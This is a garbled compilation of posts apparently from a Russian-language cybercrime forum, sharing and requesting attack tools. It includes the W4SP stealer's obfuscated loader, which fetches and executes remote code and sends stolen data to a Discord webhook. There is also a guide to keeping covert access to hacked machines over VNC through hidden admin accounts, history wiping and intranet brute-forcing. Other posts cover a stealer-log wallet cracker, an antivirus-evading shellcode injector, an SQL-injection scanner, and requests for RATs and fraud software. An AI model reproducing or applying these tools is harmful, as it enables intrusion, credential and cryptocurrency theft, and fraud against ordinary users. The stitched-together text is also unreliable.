func matchesPattern(address string, searchOption int, firstCharacters, lastCharacters, sequence string) bool {
switch searchOption {
case 1:
return strings.HasPrefix(address, firstCharacters)
case 2:
return strings.HasSuffix(address, lastCharacters)
case 3:
return strings.HasPrefix(address, firstCharacters) && strings.HasSuffix(address, lastCharacters)
case 4:
return strings.Contains(address, sequence)
default:
return false
}
}
func generateKey(attempts int) (*key, error) {
var k key
privateKey, err := crypto.GenerateKey()
if err != nil {
return nil, fmt.Errorf("failed to generate key: %w", err)
}
privateKeyBytes := crypto.FromECDSA(privateKey)
k.privateKey = hexutil.Encode(privateKeyBytes)[2:]
publicKey := privateKey.Public()
publicKeyECDSA, ok := publicKey.(*ecdsa.PublicKey)
if !ok {
return nil, errors.New("error casting public key to ECDSA")
}
publicKeyBytes := crypto.FromECDSAPub(publicKeyECDSA)
k.publicKey = hexutil.Encode(publicKeyBytes)[2:]
address := crypto.PubkeyToAddress(*publicKeyECDSA).Hex()
address = "41" + address[2:]
k.addressHex = address
addb, _ := hex.DecodeString(address)
hash1 := s256(s256(addb))
secret := hash1[:4]
addb = append(addb, secret...)
k.addressBase58 = base58.Encode(addb)
k.attempts = attempts
k.numT = countStartingTs(k.addressBase58)
return &k, nil
}
func s256(s []byte) []byte {
h := sha256.New()
h.Write(s)
bs := h.Sum(nil)
return bs
}
func countStartingTs(address string) int {
var count int
for _, char := range address {
if char == 'T' {
count++
} else {
break
}
}
return count
}
Как только на этом форуме появился конкурс на интересные наработки, я сразу понял, что я обязательно что нибудь сделаю для пользователей форума, что может быть полезным некоторым людям. К сожалению, так вышло, что я просто не успел к завершению конкурса, но я в любом случае не отказываюсь от своей идеи сделать что-то бесплатное и с открытым исходным кодом для вас, поэтому представляю вам SOCKS5 BackConnect/Reverse Proxy с веб-панелью.
Технические моменты
Сразу подмечу, что я даже не знал что такое BackConnect Proxy или Reverse Proxy, все изучалось по ходу создания проекта. Также, проект не готов полностью , я в билде не дописал автозапуск, но можно обойтись без дописания кода, просто попросив криптора накинуть добавление в автозапуск
Инструкции по установке
Spoiler: 1. Установка веб-панели
Панель требует Apache2, PHP и MySQL: ставите VPS сервер, накатываете все это на него и устанавливаете, либо покупаете хостинг.
Первым делом, в корневую папку веб-сайта закидываете все файлы из папки "Web- Panel Source", далее по списку:
Поздравляю, осталось еще чуток!
Spoiler: 2. Компиляция билда
Скачиваем Visual Studio 2019 и открываем папку "BackConnect Server Source", в этой папке открываем файл под названием BackConnect.sln и ждем пока прогрузится все.
ТЕПЕРЬ! Пробуем запустить наш билд на дедике и заходим на панель, если на панели в таблице у вас появился сервер, значит все работает!
Spoiler: 3. Подключение к reverse (or backconnect) proxy
На панели в таблице есть кнопка в самой левой части строки "Download .bat", нажимаем и скачиваем bat файл, в котором вся информация для поключения к прокси.
После того, как скачали .bat файл, его нужно перекинуть в папку под названием
"BackConnect Client", чтобы было вот так:
Далее запускаем этот .bat файл и видим вот такое сообщение:
Connected - успешно, мы законнектились с прокси. Это окно закрывать нельзя,
пока вы работаете с прокси сервером!
В самой первой строке вы видите IP адрес, порт и логин с паролем, которые
вам нужны для прокси
Тест прокси через Proxifier:
Тесты показали, что прокси работает и задержка составляет 14ms, а это всего на 4 миллисекунды больше, чем на самом компьютере, на котором развернут этот BackConnect/Reverse Proxy
Отвечу на несколько вопросов
Почему билд написан на C#?
Потому что он уникален, а еще потому что он легче для потенциальных
пользователей
Почему я называю эти прокси BackConnect и Reverse Proxy одновременно?
Потому что я не знаю как правильно эта тема называется. По сути, это
BackConnect Proxy, а не Reverse прокси, но я видел темы, где такой софт
называют Reverse Proxy.
Почему в нем нет функционала, который нужен для подобного рода софта?
Потому что я никогда не работал с таким видом софтов и не знаю как он вообще
работает. Я написал этот проект опираясь от того, что нашел на этом форуме и
смог нагуглить.
Собираешься ли ты поддерживать этот проект в будущем?
Не знаю, думаю, что нет, но если кому-то нужна будет моя помощь - то я с
радостью помогу и буду помогать, пока мне просто не надоест отвечать на
миллион, вероятно, одинаковых вопросов
Почему веб-панель такая некрасивая и не функциональная?
Потому что, это всего лишь пример, а не готовый продукт (черновой вариант,
другими словами)
Hi.
Есть у кого крякнутый софт z668? Нужен для тестов
XMRAPI, написанный на языке Go поверх веб-фреймворка Fiber, упрощает прием платежей способом, обеспечивающим безопасность.
Требования к аппаратному обеспечению:
Как минимум 4 ГБ оперативной памяти и 2 ядра ЦП (поскольку на нем также будет
работать сервер Monero RPC).
Требования к программному обеспечению:
Nginx Web Server, Tor, Monero cli wallet
Как настроить:
Перейдите к файлам main.go и xmr.go в начале и измените константы: RPCUSER,
RPCPASS, MULTISIG_WALLET_PASS, APIKEY, PORT.
Bash:Copy to clipboard
cd xmr
go build
После этого войдите на сервер и запустите Monero RPC, введя следующую команду.
Bash:Copy to clipboard
./monero-wallet-rpc --rpc-login rpc_user:rpc_password --daemon-address node.moneroworld.com:18089 --wallet-file WalletFileName --password 'pass' --rpc-bind-ip 127.0.0.1 --rpc-bind-port 18082
Запустите сеть Tor, поскольку преобразование из USD в XMR будет выполняться
через Tor, чтобы добавить некоторую анонимность.
Пожалуйста, друзья, если вы обнаружите какие-либо ошибки или проблемы безопасности, сообщите мне. Я буду очень рад исправить их. Наслаждайтесь!
Enjoy!
Spoiler: Download
Code:Copy to clipboard
https://send.exploit.in/download/d0b24e784cb5fcd2/#NI3mWjNePhnfWcrbh9Ef1A
https://download.ru/files/eHK566ZN
Spoiler: Virus total
Code:Copy to clipboard
NLBrute_Manager.exe: https://www.virustotal.com/gui/file/6badcd1498647bd5fc54d31b9ff03995daaae055ae7079c4c0387c61fda2806c
NLBrute_watch.exe: https://www.virustotal.com/gui/file/6badcd1498647bd5fc54d31b9ff03995daaae055ae7079c4c0387c61fda2806c
NLBrute.exe: https://www.virustotal.com/gui/file/a332f863da1709b27b62f3a3f2a06dca48c7dabe6b8db76ec7bb81ce3786e527
Implements BIP39 standard mnemonic generation.
Generate seeds according to your own set on the options.
Generates [350 total by default].
After generation it will automatically check for balances based on the
generated phrases.
If a wallet is found with corresponding balances. it will be saved on the path
folder .
Spoiler: Sample generated phrases
swap idle rally luxury elevator type phrase spell bridge holiday head sign
clinic job laundry civil cargo gym play language theme reopen delay orient
family symptom party axis bar rule twist lab merit supreme job spider
wheel prevent nerve frequent tuition fire idea decade water skull fiscal night
cabin shove female indoor shift metal around rude smart bar gas anger
will casino garment method flavor scrap trade achieve clever ecology party
pipe
inspire utility movie view dose gas original gravity cricket frost quote shrug
shield badge flash update retire resist act warfare what check juice fork
sustain vapor quantum quiz index salon witness panic duck bronze flower
captain
pigeon essay wolf damage escape edit tuna acoustic egg beyond census door
holiday gun kite iron property local rifle observe trophy wool ecology ring
range credit above bitter way wide worth answer buyer habit peanut peace
plug lady flush forget rely laugh prefer vast check scrap genuine shift
life magnet version weird error cause image emerge impulse loop sleep round
bonus produce bargain market accuse train valid response magic either air
script
emotion pulse wool exchange kangaroo front bundle right cheese erode trap
butter
chest exotic ostrich liberty advice recipe slogan pony damage visa assume boss
make relief oil shallow season transfer armor board program sleep ahead dwarf
depth shiver dynamic about jelly visa apart name warm display coil donor
As per required you need an Infura {project API_KEY}.
For checking balances on the mainnet and others according to your needs.
API DASHBOARD
Soft:
You must have at least 150 reaction(s) to view the content.
You can modify according to your own needs.
Понимаешь, сейчас чтобы проверить, можешь ли взломать кошелек, приходится
делать это вручную, по одному, что, согласись, бесполезно и долго. Но моя
программа берет на себя всю эту работу.
Вот как она работает. Она берет папку, где хранятся все пакеты, и начинает искать кошельки один за другим. Если находит, то смотрит, это кошелек Metamask, Exodus, Electrum или что-то другое, типа .dat (типа Bitcoin или Doge). Затем пробует получить хеш каждого из них и готовит землю для cracking. Если всё идет по плану, начинает cracking. Если успешно, сохраняет путь к кошельку вместе с расшифрованным паролем. И так продолжается, пока не проверит все пакеты.
Плюс, программа принимает: Redline, lummac2, meta, meduza, vidar, raccoon, RisePro и stealc.
В общем, программа показала отличные результаты в моих тестах. Из примерно 100 000 пакетов, большинство удалось взломать:
Для Metamask из примерно 5 000 кошельков почти 4 500 взломали! (90%).
С Exodus из примерно 3 000 кошельков почти 2 800 попало в сети! (93%).
Для Electrum из примерно 2 000 кошельков около 1 700 были взломаны! (85%).
А для файлов .dat из примерно 800 кошельков более 750 были взломаны! (93,7%).
Cамые интересные кошельки – это Exodus и Metamask. Хотя, правда, я не встречал много кошельков с более чем 10k. И, если честно, я не люблю снимать еду от кого -либо, но если у кого -то есть большое облако, и он может взломать кошелек, полный денег, просто подумайте, что, поскольку он получил бесплатную программу, жертвует небольшой частью людей, которые нуждаются есть
Если кто-то имеет идеи, как улучшить программу или как избежать ручной проверки каждого кошелька (ведь большинство из них пустые), я открыт для предложений. Я думал создать бота, который будет это проверять и говорить, сколько денег на счете, но, может быть, есть идеи получше. В общем, вот почему я так люблю открытый код: он делает мир более свободным, безопасным и открытым. Так что любые идеи приветствуются!
Отзывы обо всех функциях можно найти в коде, но если вам что-то непонятно, не стесняйтесь спрашивать
**Автор: Wellerman
Источник:
**https://xss.is
You must have at least 5 reaction(s) to view the content.
Ищу RAT под Android - в аренду
Нужен VNC.,грабер,прием звонков,переодресация,запрет входящих,приеб смс,черный
эекран
Обязательно тест перед оплатой за аренду
Обязательон через гаратна
Жду предложений ,прошу писать сразу по делу,без таких сообщеий как ...
Кидай 5к - напишу ,поставлю на колени и тд
I released the code previously in the thread I was using to write about the injector and the changes I made until reaching this first version. The goal of the project was very basic, make a injector and change it until it can inject code without being detected(only defender was used on tests), also let the code easy to use for other people just include their payload and build.
Since its very simple I will list the "features" from the injector:
The usage is also very straight, the shellcode should be save in the same
directory as the project with the name 'shellcode.bin', then running build.sh
the injector.exe will be the output. The injector execution is also very
simple, it just receives the process ID of the target process on command line,
here is a demo, where I injected msfvenom payload to run notepad.exe. I used
CalculatorApp.exe as the target and procmonitor to show the event.
I described almost all steps of development on this Thread Evolving from basic
Download Link: https://xss.is/attachments/77058/
MAGNET AXIOM V4.6.0.21968 X64 - Система мобильной криминалистики (Несколько языков)
Восстанавливайте цифровые доказательства из большинства источников, включая смартфоны, облачные сервисы, компьютеры, устройства Интернета вещей и сторонние образы.
Используйте мощные и интуитивно понятные инструменты аналитики, чтобы легко анализировать все данные в одном файле дела.
Ссылка для скачивания:
](https://anonfiles.com/L218Odj2p0/AXIOM_v4.6.0.21968_x64_Multilanguage_XSS.IS_rar)
anonfiles.com
Скажу прямо - на данный момент скрипт сыроват, и будет дорабатываться.
Что делает скрипт? Полностью автоматически собирает сайты с xss и sql
уязвимостями.
Как это работает? Через гугл дорки. Вы вводите запрос, количество проверяемых
сайтов, опцию проверки, потоки, и скрипт проходится по сайтам.
Функционал:
1. Работа через прокси
2. Выбор кол-ва потоков
3. Выбор проверки: xss, sql, xss&sql
4. Возможность добавления сайтов в исключение
5. Проверка прокси перед запуском проверки
Известные мне недочеты:
1. Плохая проверка xss(фактически нерабочая)
2. Достаточно долгая проверка(хотелось бы быстрее)
3. Неудобное добавление прокси.
Что будет добавлено в новой версии:
1. Фикс всех недочетов
2. Будут добавлены новые источники
3. Более удобный и красивый вывод сайтов с уязвимостями
4. Фикс мелких ошибок
Зачем я выкладываю сырой скрипт?
Что бы получить фидбек, а нужно ли это вообще. Ну и конечно же что бы получить
предложения по улучшению.
Работа скрипта
Вывод в cmd:
Spoiler: скрин
Как вы можете увидеть, проверка происходит через подстановку в ссылку
пэйлоада, а уязвимость ищется по ошибкам. Так же в скрипте установлен таймаут,
если от сайта нет ответа в течение определенного времени, то он пропускается.
В самом начале происходит проверка работоспособности прокси для каждого файла
где они используются.
Вывод в файл:
Spoiler: скрин
Знаю, всего много и всё непонятно. Не могу придумать красивый вывод.
Правильность проверки:
Из 20 сайтов помеченных как уязвимые, 4 были без уязвимости. Я считаю что
результат довольно приемлемый.
Что и куда добавлять:
файлы dorks и proxies можно не трогать, они нужны на следующее обновление.
Что бы добавить сайты в исключения, нужно добавить домены построчно в файл
exclude_domains
так же вы можете добавить свои пэйлоады и ошибки в файлы sql_errors и
sql_payloads соответственно.
В файлах checks.py и search.py вставляются прокси(без них работать не будет)
Spoiler: тестовые прокси
194.67.219.6:9126 log:passtYEHNF:4qL46y
Используйте только для тестов!****
Сам скрипт на данном этапе я не считаю конкурсным, но по мере обновления думаю что дотянет Ожидаю фитбеков!
Подскажите где можно найти крякнутый CraxsRAT 6.7? Покупать лицензионную версию не хочется, дороговато
Простенький скрипт для телеграма.
Для чего?
Как видим из названия - для OSINT. Это этакий Telegram Search Engine на
минималках. (Хотя если у вас 100+ аккаунтов, то можно переплюнуть как TeleSint
Что может?
+ Собирает ВСЕ сообщения со всех групп куда вы вступили. Кто писал, куда
писал, что писал и когда писал.
+ Записывает все в БД.
+ Если знакомы со SQL то можете
Производить поиск по ID:
Смотреть в каких чатах был замечен пользователь
Смотреть ВСЕ сообщения одного пользователя
Смотреть все сообщения в группе
Смотреть в каких группах состоит пользователь по ID
Что делать?
Просто запускаете бота, вступаете в группы со своего (лучше со спецально
созданного для этого аккаунта)
Какие перспективы для дальнейшего развития?
Можно дописать, что бы скачивал все вложения со всех групп.
Уведомления по ключевым словам, например "тел", "связ", "mail" и т.д.
Доработка с выдиранием мета-тегов из файлов "на лету"
Да собственно, что угодно. Макет настолько универсален, что кажется
возможности безграничны.
Язык программирования: Python 3+
Зависимости
Python:Copy to clipboard
pip install asyncio
pip install telethon -U
Структура DB
SQL:Copy to clipboard
CREATE TABLE "messages" (
"user_id" INTEGER NOT NULL,
"channel_id" INTEGER NOT NULL,
"message_id" INTEGER NOT NULL,
"channel_username" TEXT NOT NULL,
"message" TEXT NOT NULL,
"timestamp" INTEGER NOT NULL
);
Получить api_id и api_hash тут
Скачать
Hidden content for authorized users.
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Spoiler: screen
Автор: Guron_18 для xss.is
Main Download:
You must have at least 25 reaction(s) to view the content.
Source Code:
You must have at least 50 reaction(s) to view the content.
Подобрать пароль к VNC — даже не половина дела. Как гласит известная мудрость
удержаться на вершине гораздо сложнее, чем на нее забраться. Знали бы вы,
дорогиемои читатели, сколько доступов я потерял по неопытности в первые месяцы
своего путешествия по взломанным машинам.
Основная проблема VNC – доступ к интерактивному сеансу, т.е. пользователь
видит что кто-то копашится на компьютере (если находится у экрана, конечно). В
целях облегчить себе жизнь был написан ряд утилит, которыми я и спешу
поделитьсяс вами, друзья.
VNC Hider (vh.exe)
Первая проблема, с которой нам предстоит столкнуться — отключение обоев и
иконка в трее. Не потребовалось много времени, чтобы выяснить, что более-менее
опыт пользак завидев странные движения мыши и открывающиеся сами собой окна —
первым делом кидается в трей и пытается прибить незванного гостя из меню VNC-
сервера. Далее, как правило, следует удаление оного. Оно нам надо? Правильно,
не надо. Для этих целей нам и послужит данная утилита: она сама определяет тип
сервера (UltraVNC, TightVNC, RealVNC) и меняет его настройки (скрывает иконку
в трее, отключает удаление обоев); помимо этого она удаляет из «Пуска» папку с
программой и упоминание о ней из списка установленных программ и, на сладкое,
прописывает службу VNC-сервера с список загружаемых в безопасном режиме.
Далее перезапускается служба VNC-сервера, а файл удаляется.
Помимо этого, в качестве бонуса, добавляются два пользователя: «Гость» и
«vasya». Бонусом является тот факт, что пользователь «Гость» и его описание не
вшито в код, а берется прямиком из ресурсов библиотеки «samsrv.dll», т.е.
зависит от языка системы. Выглядит это примерно так:
После добавления новых пользователей:
Реальный «Гость»:
Фейковый «Гость»:
Пароль к пользователю vasya:loh, к Гость:vasya_loh. Надеюсь понятно, что это
просто пример и у меня пароль от гостя отличается (вам тоже рекомендую
поменять
и пользователя «Vasya» у меня нет (я использую более правдоподобное имя. И
более сложный пароль). Да, оба пользователя состоят в группах Администраторы и
Удаленный рабочий стол.
VNC Password Changer (vncpw.exe)
На компьютере с паролем вроде «123» оставлять все в исходном состояние —
сумасшествие, слишком велика конкуренция
Данная программа (входит в решение «vnc_hider») меняет пароль на «10005000».
При желании можете поменять в коде на свой. Оба инструмента сверкают как огни
на новогодней елке (в основном из за метода повышения привилегий) и либо
потребуют отключения антивирусов, либо, что более логично, переписывание под
свои нужды. Например, неплохо себя зарекомендовал вариант с dll, rundll32 и
ярлыком, запускающимся от имени Администратора.
RFB Input Sender (input_sender.exe)
Все это здорово, скажете вы, но как же нам запустить файл и не вызвать
подозрений, если пользователь за ПК? Очень просто! Для этого нам понадобится
данная утилита. Как следует из названия, предназначена она для эмуляции ввода
с клавиатуры. По схожему принципу работают VNC-черви. Пройдемся по параметрам,
тут есть о чем рассказать.
Send via copy/paste — как очевидно из названия, вместо эмуляции ввода с
клавиатуры вводит строку по средствам буфера обмена.
Use alt method — вводит текст с помощью Alt-кодов. Бывает полезно на всяких
не-английских расскладках. Подробности можно почитать тут
_ttps://xakep.ru/2018/06/25/badusb-keyboard-layout/ (можно не оплачивать
подписку, вступления к статье вполне достаточно для понимания).
Press Win+R — открыть окно «Выполнить». Бывает нужно не всегда (например, надо
ввести ссылку или скрипт написать, а буфер обмена не работает. Или вовсе
«Выполнить» уже открыто).
Prepare cmd.exe — дополнительно оборачивает команду в
Code:Copy to clipboard
cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers && %s && exit"
для маскировки (например, если открывается консольное окно и долго висит).
Press VK_LEFT/VK_RIGHT — бывает, что с первого раза «Выполнить» не вызывается
и нужно нажать что-то еще. Как правило — помогает. Наблюдал не раз такое
поведение при открытых excel-таблицах, не знаю с чем связано.
Clear history — после выполнения основной команды дает дополнительно еще одну
Code:Copy to clipboard
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f /va
тем самым очистив историю команд. Пользуюсь всегда, когда запускаю сторонний
софт. Очень полезно: когда удивленный пользователь лезет в «Выполнить» и видит
там путь к файлу — он всенепременно захочет посмотреть, что это за файл такой.
В своих программах лучше сразу на точке входа чистить данную ветку.
Данная утилита очень хорошо работает в связке со встроенным файловым
менеджером: заливаем файлы куда-то не далеко (короче путь — быстрее ввод, я в
предпочитаю папку c:\Intel) и запускаем просто указав путь (например,
c:\Intel\vh.exe) в качестве передаваемой строки. Быстро, незаметно, удобно
VNC Dead Killer (vnc_dead_killer.exe)
Представляет из себя простое диалоговое окно, при закрытии которого
завершается работа приложения. Предназначение его очевидно из названия: оно
прибивает дохлые VNC-сессии. Нужно это для проверки заблокированных VNC. У
меня это выглядит следующим образом: при обнаружении VNC с экраном блокировки
я первым делом пытаюсь завершить работу. Если такая возможность есть —
отлично, достаточно дождаться пока машину опять включат (см. следующую
утилиту) и войдут в учетку. Если включили и не разблокировали — повторяем
процесс
Если же кнопки выключения нет — сохраняю на диск с расширением .vnc (для
UltraVNC и RealVNC) или .tvnc (для TightVNC) и группирую по 15 штук в
отдельные папки. Далее, примерно дважды в день пробегаюсь по папкам и
запускаю, в надежде увидеть открытую сессию. Чтобы не тыкать стопицот раз при
возникновении ошибок и нужна эта программа.
RFB Pinger (pinger.exe)
Бывают ситуации, когда нужный компьютер не в сети (например, выключают на
ночь. ну или мы выключили в своих коварных целях). Для этого нам пригодится
данный инструмент. Это не пингер в прямом смысле — icmp-пакетов он не
посылает, так что может работать и с Whonix. Вместо этого он пытается
подключиться к указанному адресу и сграбить баннер. Если адрес недоступен или
нет баннера VNC (например, в случае с динамическим IP) – компьютер считается
оффлайн.
Поддерживается три типа клиентов: TightVNC, UltraVNC и RealVNC. Пути к ним
доступны в настройках.
Чтобы настроить шаблоны файлов подключения для каждого клиента придется лезть
в базу pinger.db и редактировать значение полей «*_file» таблицы «settings»,
если такая необходимость имеется. Во избежании обнаружения по неосторожности в
параметрах подключения указан флаг view-only, чтобы мышью лишний раз не
елозить.
Для удобства соединения можно группировать по какому-либо признаку. Для этого
при создании/редактировании подключения нужно выбрать группу из списка или
ввести новое название
Тут же можно задать/изменить тип клиента, который также меняется и из
контекстного меню
Комментарий, как и название группы, можно менять просто повторным нажатием на
выбранном поле.
Intranet RFB Bruter (wpfw.exe)
Бывают ситуации, когда в сети есть еще куча машин с VNC, а пароль не подходит.
Можно, конечно, установить VPN и просканировать сеть брутером из прошлого
треда, но это не удобно — для таких случаев предназначен данный инструмент. Он
сам просканирует сеть и начнет перебирать пароли к найденным машинам.
Параметры задаются в файле license.lic, в таблице «scan». Пройдемся по ним.
cur_ip – начала диапазона для сканирования
last_ip — конец диапазона
max_clients — общее число соединений
max_bad_clients — число соединений на перебор паролей. т.е. max_clients-
max_bad_clients=число соединений, который сканируют сеть
ports — порты для сканирования. Задаются как в масскан, через запятую. Можно
указать диапазон через дефис.
wol — побуждать машины в сети перед началом сканирования
Также важно заполнить таблицу «dict» паролями, которые могут использоваться в
данной сети.
Файл license.lic переодически копируется в файл user.lic. Сделано это по
причине того, что UltraVNC не может скачать файл, который открыт sqlite, а
мониторить как происходит процесс перебора всеже нужно.
RDPWrap (rdpw.exe)
Это не совсем по теме VNC, просто дополнительный способ закрепиться в системе.
Представляет из себя допиленный rdpwrap от stas_m: добавлено отключение
обновлений Windows (чтобы конфиг был всегда актуальным), а также функция
доступа к консоли с лок-скрина. Для этих целей в комплекте также прилагается
mstsc из дистрибутива Windows XP, который позволяет подключаться без NLA
Чтобы получить доступ к меню необходимо нажать комбинацию Ctr+Alt+S и ввести
пин-код «10005000». Их можно поменять в коде (например, заменить
RegisterHotKey(NULL,HK_ID,MOD_ALT|MOD_CONTROL,'S') на свою комбинацию, а
SECRET_PINCODE на свой числовой пин-код).
Конфиги обновляются с помощью утилиты bin\rdpw\builder.exe — просто
перетаскиваем в нее rdpw.exe_ а следом обновленный конфиг.
Конфиги можно брать как с гитхаба, так и составлять самим. В случае, если
нужной версии системы нет в текущем конфиге — rdpw.exe выдаст соответствующее
сообщение с номером сборки в заголовоке. Вы можете как скопировать версию и
поискать на гитхабе, так и пойти путем попроще — скачать termsrv.dll, скормить
его IDAPro (предварительно положив рядом файл getversion64.dll) и когда она
закончит анализ — выполнить скрипт termsrv_batch.py (File->Script
command->Import)
В результате на выходе будет файл «номер_сборки.ini»:
Spoiler: «10.0.19041.3636.ini»
[10.0.19041.3636]
SingleUserPatch.x64=1
SingleUserOffset.x64=11E12
SingleUserCode.x64=Zero
DefPolicyPatch.x64=1
DefPolicyOffset.x64=1F315
DefPolicyCode.x64=CDefPolicy_Query_eax_rcx
SLInitHook.x64=1
SLInitOffset.x64=2866C
SLInitFunc.x64=New_CSLQuery_Initialize
LocalOnlyPatch.x64=1
LocalOnlyOffset.x64=92AF1
LocalOnlyCode.x64=jmpshort
[10.0.19041.3636-SLInit]
bFUSEnabled.x64=125098
lMaxUserSessions.x64=12507C
bAppServerAllowed.x64=125084
bInitialized.x64=125074
bMultimonAllowed.x64=125090
bServerSku.x64=125078
ulMaxDebugSessions.x64=125094
bRemoteConnAllowed.x64=12508C
В прежнем конфиге делаем поиск по строке «-SLInit]» и перед ее началом вставляем результат работы скрипта. Обновляем конфиг и перезаливаем файл. Это не многим сложнее поиска по гитхабу, зато куда более гибкое решение и позволяет ни от кого не зависеть.
Это — практически весь инструментарий, которым я пользуюсь в процессе работы из самописного и чем могу поделиться безболезненно. Пароль от архива bin: xss.is
A fast and simple designed with tkinter that will sort and format your logs to
"ULP" base with any stealer up to date.
Edit all configs for each stealer log format for the proper formatting.
Download:
You must have at least 20 reaction(s) to view the content.
Pass - local
Здравствуйте, может ли кто-то подсказать, где взять чистую ось Win10, где вырезан весь шлак от microsoft? (трекеры и прочее)
Ребят, Всем Привет! Подскажите пожалуйста софт который бы спамил http
запросами по ссылке. Используя прокси.
Желательно под линукс, но можно и под винду.
You must have at least 10 reaction(s) to view the content.
ФУНКЦИОНАЛ:
Spoiler
Remote Desktop
Remote Shell
HRDP Manager
Reverse Proxy
Monitor Grabber
DDos Attack
Computer Manager
Task Manager
File Manager
Clipboard Manager
Regisitry Manager
Start up Manager
Computer Lock
Password Recovery
All browser recovery
steam file recovery
Filezila server recovery
Monotring
Camera monitring
audio feeds
keylogger
dns viewrs
execute local files
execute url
scripts
chat
stealr
bitcoin stealr
monero stealr
ethereum steal
bitcoin miner
ethereum miner
monero miner
cd drive
monitor on off
mouse control
on off
Скачать:
You must have at least 10 reaction(s) to view the content.
Куплю софт для яндекс такси/убер/с подменой gps. Софт для заливов.
You must have at least 1 reaction(s) to view the content.
You must have at least 1 message(s) to view the content.
Вопрос на засыпку
Хотелось бы узнать, существует ли готовое решение для проверки валидности
email строк и наличия определённого запроса в самом почтовом ящике?
Раньше, я на соседнем борде видел, как wwh (не реклама), что провали софт, который использовал 10x3080, где ты можешь спокойно сам брутить, даже не полизоваться хэшаттаком
Hidden content for authorized users.
В очередной раз выкладываю сорцы iOS бота, а то меня спрашиваю постоянно в ЛС...
anonfiles.com
Статья к исходникам https://xakep.ru/2009/07/23/48932/
p.s.
Вам повезло, что я его не удалил у себя с харда, пришлось поискать...
p.p.s.
Я не пишу малварь
النحل](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fimages%2Ficons%2Femoji%2Funicode%2F1f41d.png&hash=863a87fc27de9416e88f138deeb63058) W4SP Stealer
w4sp Stealer official source code, one of the best python stealer on the web
W4SP Stealer | W4SP API | W4SP Bot
تنبيهات](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fimages%2Ficons%2Femoji%2Funicode%2F1f6a9.png&hash=4079a8e625079d50a8405baeccc92c3f) Table of Content
Python:Copy to clipboard
1. Put ur webhook in wasp.py: hook = "DISCORD_WEBHOOK"
2. Obfuscate & Upload anywhere (needs to be accessible with an http request)
3. Put wasp.py link in injector.py: request.urlopen("W4SPGRAB").read()
4. Obfuscate it
Python:Copy to clipboard
from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen("INJECTOR_LINK").read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass
# replace INJECTOR_LINK by the injector.py link from setup
# (this script was made by Bill)
Code:Copy to clipboard
# encode in b64 the last payload and replace it here
# then hide this line in a legit looking python script
# or use ur brain and ur own technique, this is just un exemple
# remeber, its for education purpose, attacking a machine w/o autorisation is illegal !
__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("%PAYLOAD%"),'<string>','\x65\x78\x65\x63'))
(Stealer by @loTus04)
Global
Discord
Wallets
Gaming
Other
File Stealer
(Injector by @loTus04)
Credit to xKian who improved the injector (v1.2)
(Api by @billythegoat356)
(Bot by @billythegoat356)
Most articles writen after that are 95% bullshit
This is another Telegram-based OTP bot that I wrote 4 years ago. Set up for personal use. The code is absolute nonsense, but the bot works
You must spend at least 100 day(s) on the forum to view the content.
](https://anonfiles.com/scR1Z3d1zb/FC_BOT_v_2_0_zip)
anonfiles.com
Может кто знает бесплатный или не дорогой Wordpress чекер желательно с поиском
шопов раздела woocomerce .
чтоб чекал link:login:pass или со стиллеров из password
Спасибо .
Yanyx UI - Bootstrap 4 + Laravel Starter Kit Admin Dashboard Template
Spoiler: Описание
Yanyx UI dashboard template built with Bootstrap 4.0, Laravel, HTML5 and CSS3. Yanyx UI helps you to create your next Bootstrap Project even faster then before. It contains 3 Dashboard Versions.It is easy to customize and developer friendly. It works on all major web browsers, Desktop, iPhone, iPad, Tablet and all other smartphone devices. It can be used to create a SAAS based interface, admin panel dashboard, accounting software, project management, eCommerce backends, CMS, CRM, ERP or anything you want to build on the web. It is built for modern applications that supports HTML/jQuery/Laravel integrations.
You must spend at least 30 day(s) on the forum to view the content.
P.S. Если не в том разделе, перенесите пожалуйста.
Приветствую посоны,
сорян что может не совсем по теме форума вопрос, но уже отчаялся,
суть в том, что надо извлечь из видео, аудиодорожку, и идентифицировать ее, проблема в том что качество ужасное на видео, много посторонних шумов(ветер и т.п.) и 90% слов диалога-не слышно,
может можно как-то улучшить аудиодорожку с видео что бы было можно идентифицировать слова говорящих?
вопрос важный, видео-доказательство в суде по ч3 ст 159 ук,
благодарю за внимание к теме и ответы!
Чекер логов на совпадение с базой ранее проверенных логов.
Чекает по названию папки лога, тобишь по айди.
Позволяет выгрузить в отдельные папки паблик/приват логи.
Принимаються пожелания по доработке и расширению функционала.
Пасс местный, инструкция внутри.
Python, PyQt5, GUI.
На форуме не нашёл, если дубль - удалите. С разделом, надеюсь тоже не ошибся, но если что могу пересоздать в спаме
](https://anonfiles.com/zaB4p2J1ue/PMC1.5r19_zip)
anonfiles.com
](https://anonfiles.com/XcB7pbJ7u1/PowerMTA5.0r3_zip)
anonfiles.com
Написал небольшой, но полезный софт, хочу поделиться с форумом.
Для запуска программы надо сначала выполнить 2 шага:
pip install -r requirements.txt
Далее выполняем python main.py
и получаем на выходе http_proxies.txt и
socks5_proxies.txt
Если есть какие-то недочёты, замечания или предложения, можем пообщаться в комментах.
P.S. когда будет настроение + свободное время, добавлю ещё сайты для парсинга (код впринципе легко поддерживается, так что и вам самим не составит большого труда это сделать, если есть необходимость)
Hi APTS
new release , i will keep regular updates
i will let u explorer this mistry tool
pass : orca.bot
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/9p4EURIT#pyfIxiF0ES3PBUPq6ZBp7tM8Ksq9mlKY4zjoBn2xBYI)
mega.nz
